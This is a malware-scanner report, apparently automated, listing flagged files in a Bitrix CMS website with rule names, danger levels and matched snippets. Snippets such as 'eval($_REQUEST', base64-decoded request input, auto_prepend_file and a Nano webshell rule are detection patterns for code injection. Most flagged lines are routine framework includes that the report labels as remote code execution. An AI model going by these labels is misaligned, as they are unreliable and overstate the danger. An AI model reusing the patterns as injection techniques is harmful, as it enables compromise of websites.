/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/old_version_16/section_vertical.php

Size: 19.71 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 44 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

include",
            "",
            Array(
                "
AREA_FILE_SHOW" => "file",
                "
PATH" => $arParams["SIDEBAR_PATH"],
                "
AREA_FILE_RECURSIVE" => "N",
                "
EDIT_MODE" => "html",
            ),
            false,
            array('HIDE_ICONS' => 'Y')
        );?>
    <?endif?>
</div>
<?endif?>
<div class="
<?=(($isFilter || $isSidebar) ? "col-md-9 col-sm-8 col-sm-pull-4 col-md-pull-3" "col-xs-12")?>">
    <div class="row">
        <div class="col-xs-12">
            <?
                
if(ModuleManager::isModuleInstalled("sale"))
                {
                    
$arRecomData = array();
                    
$recomC...

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/catalog/templates/.default/section.php

Size: 2.44 kB Created: 2017-05-21 22:21:46 Modified: 2023-06-30 13:57:48 Dangers: 1
DescriptionMatch

Exploit execution Line: 76 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$this->GetFolder()

/var/www/kievflotq/kievflot.ua/bitrix/components/bitrix/forum.index/component.php

Size: 18.80 kB Created: 2017-05-21 22:21:51 Modified: 2023-06-30 13:57:48 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 111 Warning

Double var technique is usually used for the obfuscation of malicious code

${$PAGEN_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/f0/f07dce8c4e2dc4854bf9f47be3173581.php

Size: 58.42 kB Created: 2024-03-03 10:42:43 Modified: 2024-03-03 10:42:43 Dangers: 1
DescriptionMatch

Sign 34b7e999 Line: 433 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/60/6021ba8a3c2d97491c48a0378e94ed76.php

Size: 485.50 kB Created: 2024-03-03 11:07:45 Modified: 2024-03-03 11:07:45 Dangers: 1
DescriptionMatch

Sign 34b7e999 Line: 4083 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/18/184039ea1c1c3bed2beda7474c15ea8e.php

Size: 485.83 kB Created: 2024-03-03 11:07:46 Modified: 2024-03-03 11:07:46 Dangers: 1
DescriptionMatch

Sign 34b7e999 Line: 4083 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/eb/eb7c928b63ac38019b21db6a0593fe64.php

Size: 70.29 kB Created: 2024-03-03 10:42:12 Modified: 2024-03-03 10:42:12 Dangers: 1
DescriptionMatch

Sign 34b7e999 Line: 531 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/user.php

Size: 7.37 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit download_remote_code2 Line: 197 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($f"<?include(\$_SERVER[\"DOCUMENT_ROOT\"].\"/bitrix/modules/security/options_user_settings_1.php\")

Exploit execution Line: 197 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include(\$_SERVER[\"DOCUMENT_ROOT\"].\"/bitrix/modules/security/options_user_settings_1.php\")

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/post_filter.php

Size: 7.08 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 162 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($f"\n------------------------------\n\$_SERVER:\n")

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/antivirus.php

Size: 44.22 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 528 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($f"\n------------------------------\n\$_SERVER:\n")

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/system_information.php

Size: 8.31 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 377 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/iprule.php

Size: 30.43 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 1239 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/security_403.php")

Exploit execution Line: 976 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/admin/security_403.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/tests/environment.php

Size: 13.68 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

posix_getpwuid($uid); return sprintf('%s(%s)'$uid['name'], $uid['uid']); } return $uid; } protected static function formatGID($gid) { if(is_callable("posix_getgrgid")) { $gid posix_getgrgid($gid); return sprintf('%s(%s)'$gid['name'], $gid['gid']); } return $gid; } protected static function formatFilePermissions($perms) { if (($perms 0xC000) == 0xC000) { $info 's'; } elseif (($perms 0xA000) == 0xA000) { $info 'l'; } elseif (($perms 0x8000) == 0x8000) { $info '-'; } elseif (($per...

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/event.php

Size: 5.49 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function syslog Warning

Potentially dangerous function `syslog`

[https://www.php.net/syslog]

syslog($this->syslogPriority$message); } if ($this->isFileEngineActive) { if (!$message$message $this->messageFormatter->format($auditType$itemName$itemDescription); $message = static::sanitizeMessage($message); $message .= "\n"$savedInFile file_put_contents($this->filePath$messageFILE_APPEND) > 0; } return ($savedInDB || $savedInSyslog || $savedInFile); } public static function getSyslogPriorities() { return static::$syslogPriorities; } public static function getSyslogFaciliti...

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/install/index.php

Size: 10.92 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 211 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/security/install/events.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/ru/admin/security_antivirus.php

Size: 3.09 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit file_prepend Line: 12 Dangerous

LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine

php_value auto_prepend_file

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/classes/general/tests/environment.php

Size: 5.08 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 20 Dangerous

Malware Signature (hash: 11413268)

exploit

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/classes/general/tests/php_configuration.php

Size: 5.02 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 25 Dangerous

Malware Signature (hash: 11413268)

exploit

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/admin/security_antivirus.php

Size: 2.24 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit file_prepend Line: 13 Dangerous

LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine

php_value auto_prepend_file

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/lib/model/section.php

Size: 1.02 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Line: 40 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($entity)

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/classes/general/subelement.php

Size: 50.47 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(\''.CUtil::JSEscape($this->onLoadScript).'\');'; echo '</script></body></html>'; } else { if($this->onLoadScript) echo '<script type="text/javascript">'.$this->onLoadScript.'</script>'; echo $string; } define("ADMIN_AJAX_MODE"true); require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_after.php"); die(); } elseif ($_REQUEST["mode"]=='excel') { header("Content-Type: application/vnd.ms-excel"); header("Content-Disposition: filename=".basename($APPLICATION->GetCurPag...

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_subelement_edit.php

Size: 68.17 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Dangers: 5
DescriptionMatch

Exploit execution Line: 1810 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/subproduct_edit.php")

Exploit execution Line: 604 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arIBlock["EDIT_FILE_BEFORE"])

Exploit execution Line: 612 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arIBTYPE["EDIT_FILE_BEFORE"])

Exploit execution Line: 705 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/subproduct_edit_validator.php")

Exploit execution Line: 841 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/subproduct_edit_action.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_element_edit.php

Size: 113.94 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Dangers: 6
DescriptionMatch

Exploit execution Line: 1089 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/product_edit_action.php")

Exploit execution Line: 1774 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$customFormFile)

Exploit execution Line: 2979 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/product_edit.php")

Exploit execution Line: 709 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arIBlock["EDIT_FILE_BEFORE"])

Exploit execution Line: 717 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arIBTYPE["EDIT_FILE_BEFORE"])

Exploit execution Line: 842 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/product_edit_validator.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_subelement_generator.php

Size: 28.34 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(arFileProperties),
            
id 0;
        if(
BX('ib_seg_max_property_id'))
        {
            
id BX('ib_seg_max_property_id').value;
            if(
id >= obPropertyTable.AR_FILE_PROPERTIES.length 2)
            {
                return;
            }
            
BX('ib_seg_max_property_id').value Number(BX('ib_seg_max_property_id').value) + 1;
        }
        
obPropertyTable.SELECTED_PROPERTIES[id] = 'DETAIL';

        var 
propertySpan BX('ib_seg_property_span');
        if(
propertySpan)
        {
            var 
options = [];
            for(var 
key in fileProperties)
            {
                if(
fileProperties....

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.link.list/component.php

Size: 1.14 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 19 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FN}

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.filter/component.php

Size: 32.43 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 61 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FILTER_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.smart.filter/component.php

Size: 27.62 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 523 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FILTER_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.element/templates/.default/template.php

Size: 64.84 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 1114 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
                                '
CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
                                '
BASKET_URL' => $arParams['BASKET_URL'],
                                '
ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
                                '
PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
                                '
PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
                                '
USE_PRODUCT_QUANTITY' => 'N',
                                '
PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.sections.top/component.php

Size: 19.13 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 180 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php

Size: 14.80 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                        }
                    }
                    
                    
BX.ajax.processScripts(scriptstrue);
//                    commentEr object may be set in template
                    
if(window.commentEr && window.commentEr == "Y")
                    {
                        
BX('err_comment_'+this.id[1]).innerHTML data;
                    }
                    else
                    {
                        if(
BX('edit_id').value 0)
                        {
                            var 
commentId 'blg-comment-'+this.id[1];
                            if(
BX(commentId))
                            {
                                var 
newComment BX.create('div',{'html':data});    // tmp container for data
//                                paste resp...

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/template.php

Size: 31.88 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:52 Dangers: 3
DescriptionMatch

Exploit execution Line: 185 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/neweditor.php")

Exploit execution Line: 29 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

Exploit execution Line: 30 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/scripts_for_editor.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/rss.show/component.php

Size: 2.52 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('&$val, $key''$val=htmlspecialcharsex($val);')); elseif($arParams["PROCESS"] == "TEXT"array_walk_recursive($arResultcreate_function('&$val, $key''$val=str_replace(array("    ", "\\r\\n"), array("&nbsp;&nbsp;&nbsp;&nbsp;", "<br>"), HTMLToTxt($val));')); $this->IncludeComponentTemplate()

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog/templates/.default/section.php

Size: 2.44 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 76 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$this->GetFolder()

/var/www/kievflotq/kievflot.ua/bitrix/modules/subscribe/install/index.php

Size: 8.65 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 125 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/subscribe/install/events.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/socialservices/classes/general/authmanager.php

Size: 42.92 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 1505 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST[self::OAUTH_PACK_PARAM])

Exploit nano Line: 193 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

$service["CLASS"]()

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformfield.php

Size: 22.17 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformstatus.php

Size: 17.77 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_cform_old.php

Size: 9.20 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 77 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path.$template)

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformvalidator.php

Size: 7.56 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformresult.php

Size: 67.99 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformanswer.php

Size: 7.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_cformresult_old.php

Size: 7.20 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 78 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path.$template)

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformoutput.php

Size: 33.92 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>'.$this->__cache_tpl.'<?'); $strReturn ob_get_contents(); ob_end_clean(); return $strReturn; } else { return false; } } function IncludeFormTemplate() { global $APPLICATION; if ($this->__check_form_cache()) { $APPLICATION->SetTemplateCSS("form/form.css"); $FORM =& $this; eval($this->__cache_tpl); return true; } else { return false; } } function isStatisticIncluded() { return CModule::IncludeModule("statistic"); } function __check_form_cache() { global $CACHE_MANAGER; if (strlen($this->...

Sign 11413268 Line: 100 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callform.php

Size: 65.17 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 2 Dangers: 1
DescriptionMatch

Exploit double_var2 Line: 522 Warning

Double var technique is usually used for the obfuscation of malicious code

${$var}

Exploit double_var2 Line: 532 Warning

Double var technique is usually used for the obfuscation of malicious code

${$var2}

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformvalidator.php

Size: 368.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformfield.php

Size: 413.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformanswer.php

Size: 418.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformstatus.php

Size: 5.58 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformoutput.php

Size: 400.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformresult.php

Size: 15.00 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cform.php

Size: 6.01 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/options.php

